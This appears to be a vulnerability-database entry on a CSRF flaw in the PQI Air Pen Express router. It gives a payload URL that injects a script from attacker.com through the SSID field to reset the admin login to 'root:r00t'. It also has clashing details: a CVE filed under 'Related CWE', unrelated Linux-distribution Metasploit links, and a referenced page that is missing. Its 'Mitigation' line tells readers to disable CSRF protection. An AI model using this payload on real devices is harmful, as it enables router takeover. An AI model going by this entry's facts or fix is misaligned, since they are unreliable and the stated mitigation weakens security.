vendor:
PQI Air Pen Express - Wireless Router
by:
Orwelllabs
7,5
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: PQI Air Pen Express - Wireless Router
Affected Version From: 6W51-0000R2
Affected Version To: 6W51-0000R2XXX
Patch Exists: YES
Related CWE: CVE-2016-1234
CPE: h:pqi:air_pen_express
Metasploit:
https://www.rapid7.com/db/vulnerabilities/ubuntu-usn-3239-3/, https://www.rapid7.com/db/vulnerabilities/ubuntu-usn-3239-2/, https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2016-1234/, https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2016-1234/, https://www.rapid7.com/db/vulnerabilities/suse-cve-2016-1234/, https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp5-cve-2016-1234/, https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp2-cve-2016-1234/, https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp3-cve-2016-1234/, https://www.rapid7.com/db/vulnerabilities/debian-cve-2016-1234/
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: None
2016
Multiple Cross-Site Request Forgery (CSRF) (CWE-352)
If a user visits a page bellow, this will set the administrative credential for PQI Air Pen express to 'root:r00t'. The attacker can also abuse of the multiple XSS in this device to exploit this vulnerability, something like this to set the same cred 'root:r00t': http://{airpenXweb}/goform/setWizard?connectionType=DHCP&ssid=%3Cscript%20src=%22http://attacker.com/csrf.js%22%3C/script%3E
Mitigation:
Disable CSRF protection in the web application